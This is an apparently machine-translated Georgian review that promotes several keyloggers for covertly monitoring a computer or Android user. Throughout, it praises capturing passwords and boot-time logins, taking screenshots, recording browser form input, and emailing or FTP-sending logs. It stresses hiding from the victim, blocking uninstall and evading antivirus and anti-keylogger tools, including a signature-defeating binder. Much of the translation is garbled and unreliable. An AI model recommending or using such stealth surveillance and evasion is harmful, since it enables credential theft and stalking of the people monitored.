Android-ისა და სხვა ოპერაციული სისტემების ნებისმიერი keylogger-ის შესაძლებლობების გარდა, ამ პროგრამას ასევე აქვს მრავალი დამატებითი ვარიანტი. მათ შორის ყველაზე საინტერესოა ეკრანიდან გარკვეული პერიოდის განმავლობაში სკრინშოტების გადაღების შესაძლებლობა, რომლის წყალობითაც შეგიძლიათ გამოავლინოთ გრაფიკული პაროლი, ყველა სახის გრაფიკული წვდომის შეზღუდვა გარკვეული ინტერნეტ სერვისებისთვის, რომლებიც გამოიყენება თვალთვალის სამიზნე. ისევე როგორც ბევრი სხვა საინტერესო პუნქტი.

გარდა ამისა, უნდა აღინიშნოს, რომ პროგრამა გამოირჩევა რიგი სხვა სპეციალური ფუნქციებით, როგორიცაა:

  • პროგრამების დაწყებისა და დახურვის დროის ჩაწერა.
  • დაჭერილი კლავიშების ქეისის გამორჩევა.
  • ბუფერში შიგთავსის მონიტორინგი.
  • კონტროლი პრინტერების მუშაობაზე.
  • კომპიუტერული ფაილური სისტემის მონიტორინგი.
  • მონახულებული საიტების თვალთვალი.
  • Გაცილებით მეტი.

ამ პროგრამის ჟურნალის ფაილები დაშიფრულია, რის შემდეგაც მოხსენება გენერირდება საკმაოდ მოსახერხებელ html ფორმატში, ან ის ასევე იძლევა შესაძლებლობას გაგზავნოს იგი კონკრეტულ ელფოსტის ყუთში, სერვერზე ან კომპიუტერზე ლოკალური ქსელის საშუალებით. თქვენ ასევე შეგიძლიათ დააყენოთ საკუთარი პაროლი ჟურნალების სანახავად.

ყველაფერი ზომიერად

მოხერხებულობისთვის, ცალკე ლიმიტია დაწესებული ტექსტის ჟურნალების ან ეკრანის ანაბეჭდების ზომაზე, რადგან ეს უკანასკნელი ბევრად მეტ მეხსიერებას იკავებს ტექსტურ ფაილთან შედარებით. სხვა საკითხებთან ერთად, შეგიძლიათ დააწესოთ ლიმიტი მოცულობაზე, თუ იქ ძალიან ბევრი ინფორმაციაა კოპირებული, მხოლოდ ის ნაწილი დაიმახსოვრება, რომელიც იყო მითითებული.

ალბათ საუკეთესო keylogger ყველა იმ შემოთავაზებულს შორის დღეს.

მოხერხებულობა და უსაფრთხოება

უპირველეს ყოვლისა, აღსანიშნავია, რომ ეს პროგრამა არის ყველაზე მოცულობითი მათ შორის, რაც დღეს ინტერნეტში შეგიძლიათ ნახოთ, მაგრამ სინამდვილეში, მხოლოდ აღწერილობაში ყველაფერი საშინლად გამოიყურება, სინამდვილეში, Android-ის კლავიშს აქვს მხოლოდ მოცულობა. 1.51 მბ. განსაკუთრებული ყურადღება უნდა მიექცეს იმ ფაქტს, რომ მისი შიდა მწარმოებლები აწარმოებენ მას, ამიტომ მისი გაგება არც ისე რთულია, როგორც ერთი შეხედვით ჩანს.

ანტივირუსული პროგრამები სიამოვნებით უგულებელყოფენ იმ ფაქტს, რომ ასეთი პროგრამა ჩნდება სისტემაში, თუმცა ზოგიერთმა მათგანმა შეიძლება მიანიშნებდეს, რომ გარკვეული გაშვებული პროცესები საეჭვოა.

EliteKeylogger

"Elite Keylogger" არის სრულიად სტანდარტული პროგრამა, რომელიც შესანიშნავად ახორციელებს ფუნქციების სტანდარტულ კომპლექტს. მონახულებული საიტები, ელ.ფოსტის შეტყობინებები, კლავიშების დაჭერა, სხვადასხვა პროგრამების გააქტიურების და გამორთვის დრო, პაროლები - ეს ყველაფერი საგულდაგულოდ არის ჩაწერილი და ინახება კომუნალურ ჟურნალებში, რის შემდეგაც მის მფლობელს შეუძლია ყურადღებით შეისწავლოს შინაარსი. გარდა ამისა, ეს პროგრამა ყურადღებით აკვირდება მომხმარებლის მიერ გამოგზავნილ დოკუმენტებს თვითდასაბეჭდად.

ეს keylogger ცნობილია მომხმარებლებში იმით, რომ ანტივირუსული პროგრამები პრაქტიკულად არ ამოიცნობს არც თავად პროგრამას და არც მის მიერ განხორციელებულ რაიმე პროცესს. ამ შემთხვევაში, არ არის აუცილებელი პირველად გაუშვათ ეს პროგრამა, ის შეიძლება ავტომატურად გააქტიურდეს ოპერაციულ სისტემასთან ერთად და ცოტა ადრეც კი დაიწყოს, რათა დადგინდეს შესვლა და პაროლი, რომლებიც შეყვანილია Windows ჩატვირთვის პროცესში. დაუყოვნებლივ უნდა აღინიშნოს, რომ პროგრამის დეინსტალაცია შეუძლებელია, თუ მომხმარებელმა არ იცის კომუნალური ადმინისტრატორის სპეციალიზებული პაროლი. ასევე შეუძლებელია არ ითქვას, რომ ეს keylogger არის რუსულად, შეუძლებელია მისი პოვნა, რადგან ის არ არის ნაჩვენები უჯრაში, არ აჩვენებს რაიმე ფანჯარას და, პრინციპში, არაფერს აკეთებს, რაც გამოავლენს მის მუშაობას.

პროგრამა აღმოაჩენს და ასევე აჩვენებს არა მხოლოდ სტანდარტული კლავიშების, რიცხვების და ასოების დაჭერას. გარდა ამისა, მონიტორინგი ხდება სერვისის ღილაკების დაჭერით, როგორიცაა Shift, Alt, Ctrl და მრავალი სხვა. აღსანიშნავია, რომ პროგრამა საკმარისად დეტალურად იკვლევს ბრაუზერში არსებულ ყველა ოპერაციას, ანუ ის აფიქსირებს ბმულებს, რომლებსაც მომხმარებელი შეაქვს ბრაუზერში, აკონტროლებს რომელ კონკრეტულ გვერდებზე იყო შევსებული სხვადასხვა ველები და ფორმები, ასევე ახსოვს სათაურები და დააწკაპუნეთ ბმულებზე ბრაუზერებში.

მახასიათებლები და უსაფრთხოება

დაუყოვნებლივ უნდა ითქვას, რომ უტილიტა გამოირჩევა დიდი რაოდენობით სხვადასხვა ნიუანსებითა და მახასიათებლებით. ინსტალაციისას ყურადღება უნდა მიაქციოთ კონკრეტულად რას აინსტალირებთ - ფარული ინსტალაცია თუ თავად პროგრამა, რადგან ამის შემდეგ შეიძლება ძალიან დიდი ხნის განმავლობაში იტანჯოთ მისი დეინსტალაციის მცდელობა. თავად პროგრამა გამოირჩევა სხვადასხვა პარამეტრის წარმოუდგენლად დიდი რაოდენობით, ასე რომ თქვენ მოგიწევთ მისი დეტალების გაგება.

მაგალითად, შეგიძლიათ დააკონფიგურიროთ ეკრანის გადაღების რეჟიმი ისე, რომ პროგრამა ავტომატურად იღებს მაღალი ხარისხის სურათებს გარკვეული დროის ინტერვალებში ან გარკვეული მოვლენების დროს. ეს განსაკუთრებით მოსახერხებელი ფუნქციაა, რადგან ის პროგრამას უაღრესად ეფექტურს ხდის უმეტეს სიტუაციებში. აღსანიშნავია, რომ თქვენ შეგიძლიათ დააყენოთ სრულად ავტომატური ეკრანის გადაღება ისევე, როგორც სტანდარტული უსაფრთხოების კამერების შემთხვევაში, და თუ რაიმე ქმედება არ მოხდება, ეკრანის შენახვა დროებით შეჩერდება და არ მოხდება გადაღება. ამრიგად, თქვენ არ წააწყდებით სიტუაციას, როდესაც ჟურნალის დათვალიერებისას დაგჭირდებათ უამრავი სურათის გადახედვა იმის მოსაძებნად, რაც შეიძლება დაგაინტერესოთ.

აღსანიშნავია, რომ ამ პროგრამის გამოყენება ვერ აღმოაჩენს კომუნალური საშუალებების უმეტესობასაც კი, რომლებსაც ჩვეულებრივ ანტი-keyloggers უწოდებენ, რომ აღარაფერი ვთქვათ ანტივირუსულ პროგრამებზე.

მოძველებული ფაილების სრულად ავტომატური წაშლა მას შემდეგ, რაც ჟურნალი გადააჭარბებს გარკვეულ წერტილს. საჭიროების შემთხვევაში, შეგიძლიათ ყველაფერი მოარგოთ თქვენი შეხედულებისამებრ და საჭიროებებზე და ასევე, მაგალითად, მიუთითოთ, რომ გაწმენდა შეიძლება განხორციელდეს მხოლოდ სრული ანგარიშის გენერირების შემდეგ, რომელიც გაიგზავნება ელექტრონული ფოსტით. მოხსენებები ასევე შეიძლება გაიგზავნოს FTP-ით ან შეინახოს ქსელურ გარემოში.

ვირთხა

პროგრამა დაწერილია სტანდარტული ასამბლეის ენაზე, ამიტომ Windows-ისთვის ეს keylogger იკავებს მხოლოდ 13 KB-ს. თუმცა, მიუხედავად მისი ზომისა, პროგრამას შეუძლია ავტომატურად აკონტროლოს კლავიატურა სხვადასხვა პაროლის ფანჯარაში ან კონსოლში, აკვირდება ბუფერს და ასევე აქვს სხვა სტანდარტული ფუნქციების დიდი რაოდენობა.

პროგრამა აღჭურვილია სპეციალიზებული ფაილების შემკვრელით, რომელიც საშუალებას გაძლევთ თითქმის მთლიანად გამორიცხოთ წყარო ფაილების ხელმოწერებით აღმოჩენის შესაძლებლობა. ასევე არსებობს საკუთარი ტექსტური რედაქტორი, რომელიც საშუალებას გაძლევთ მოხერხებულად იმუშაოთ ნაგავსაყრელ ფაილებთან, გადაჭრას კირილიცაზე გადაყვანის ან ყველა სახის „ნაგვისგან“ გაწმენდის პრობლემა.

სინამდვილეში, როდესაც ჩვენ ვააქტიურებთ ამ პროგრამის გარკვეულ ვერსიას ჩვენს კომპიუტერზე, ჩვენ ვხედავთ აპლიკაციას, რომელიც აკონფიგურირებს კომუნალური პროგრამის მუშაობას. ამ პერსონალიზატორის შედეგი არის შესრულებადი ფაილი - მრავალფუნქციური keylogger (Windows 7). პაროლები და სხვა ტექსტური მონაცემები, რომლებსაც მომხმარებელი შეაქვს, მთლიანად ავტომატურად შეინახება ჟურნალში და სისტემის გადატვირთვის შემდეგაც კი, პროგრამა გააგრძელებს მუშაობას. თქვენ შეგიძლიათ ამოიღოთ იგი თქვენი კომპიუტერიდან მხოლოდ სპეციალიზებული პერსონალიზატორის-კონფიგურატორის, ასევე ცხელი კლავიშების დახმარებით.

შეუძლიათ ანტივირუსულ პროგრამებს მისი აღმოჩენა?

დეველოპერმა განაცხადა, რომ რუსულ ენაზე ეს keylogger სრულიად უხილავია ანტივირუსული პროგრამებისთვის და სპეციალური პროგრამებისთვის, რომლებიც აკონტროლებენ ასეთ "keyloggers". ანტივირუსული პროგრამების უმეტესობა სრულიად გულგრილია სრული ვერსიის მიმართ, მაგრამ უფასო პროგრამა აღმოჩენილია თითქმის დაუყოვნებლივ. Keylogger ასევე გთავაზობთ უამრავ პარამეტრს, მაგრამ ჟურნალის ჩვეულებრივ ნახვა არც ისე ადვილია, როგორც ერთი შეხედვით შეიძლება ჩანდეს.

რა თქმა უნდა, ფუნქციონირება ბევრად ჩამორჩება რაიმე სერიოზულ კომუნალურ პროგრამას. თუმცა, თუ თქვენ გჭირდებათ keylogger თქვენს კომპიუტერში მხოლოდ მითითებისთვის, მაშინ ეს პროგრამა შესანიშნავია.